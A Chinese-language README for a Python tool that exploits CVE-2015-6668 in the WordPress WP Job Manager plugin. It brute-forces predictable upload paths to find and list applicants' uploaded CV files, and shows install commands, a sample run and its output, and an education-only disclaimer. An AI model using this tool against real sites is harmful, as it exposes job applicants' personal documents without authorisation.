该脚本可通过 CVE-2015-6668 漏洞自动化搜索公开暴露的简历(CV)文件(如 .jpg、.png、.jpeg),该漏洞与 WordPress 的 WP Job Manager 插件(版本 ≤ 0.7.25)有关。
该漏洞允许通过直接访问 Web 服务器上可预测的上传路径,获知用户上传文件(例如简历)的确切文件名。
该脚本:
tqdm 显示交互式进度条。found_cv_urls.txt。通过运行以下命令安装依赖:
pip install -r requirements.txt
requirements.txtrequests
tqdm
colorama
python jobmanagerdisclosure.py
Enter a vulnerable website (e.g. https://example.com): https://example.com
Enter the CV file name (e.g. John Doe): HackerAccessGranted
Enter start year (e.g. 2017): 2017
Enter end year (e.g. 2019): 2019
[+] Found CV: https://example.com/wp-content/uploads/2018/04/HackerAccessGranted.png
[+] Results saved to found_cv_urls.txt
jobmanagerdisclosure.py: 主脚本。requirements.txt: 所需库。found_cv_urls.txt: 生成的包含已找到 URL 的文件。README.md: 项目文档。本脚本仅用于教育目的。不得用于未经明确授权的系统。未经授权使用此脚本可能违反法律。